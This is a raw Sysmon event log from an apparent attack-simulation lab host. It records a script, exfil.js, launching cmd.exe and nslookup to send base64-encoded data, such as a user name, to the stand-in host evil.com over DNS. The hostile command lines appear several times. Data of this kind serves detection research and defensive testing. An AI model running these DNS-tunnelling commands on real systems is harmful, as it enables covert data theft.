14:16:35.829{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-EC40-000000005F02}5736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-17A1-629A-783D-000000005F02}55525200C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-EC40-000000005F02}5736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.840{2E1864BB-17C3-629A-EC40-000000005F02}5736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvbqkuq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjjf.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-17C3-629A-EA40-000000005F02}7760388C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-EB40-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-EB40-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.787{2E1864BB-17C3-629A-E940-000000005F02}36564848C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-EB40-000000005F02}5620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.788{2E1864BB-17C3-629A-EB40-000000005F02}5620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-E940-000000005F02}3656C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjjf.tmp 2>&1 22542200x8000000000000000201601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.036{00000000-0000-0000-0000-000000000000}5992evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.910{00000000-0000-0000-0000-000000000000}5792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.781{00000000-0000-0000-0000-000000000000}7512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000201598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.643{00000000-0000-0000-0000-000000000000}660evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000201597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.739{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-EA40-000000005F02}7760C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.739{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-EA40-000000005F02}7760C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.739{2E1864BB-17C3-629A-EA40-000000005F02}7760388C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E940-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-EA40-000000005F02}7760C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E940-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-17A1-629A-783D-000000005F02}55526372C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-E940-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.723{2E1864BB-17C3-629A-E940-000000005F02}3656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjjf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.719{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlckgap.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.686{2E1864BB-17C3-629A-E740-000000005F02}65567920C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E840-000000005F02}5624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E840-000000005F02}5624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.670{2E1864BB-17C3-629A-E640-000000005F02}36362328C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-E840-000000005F02}5624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 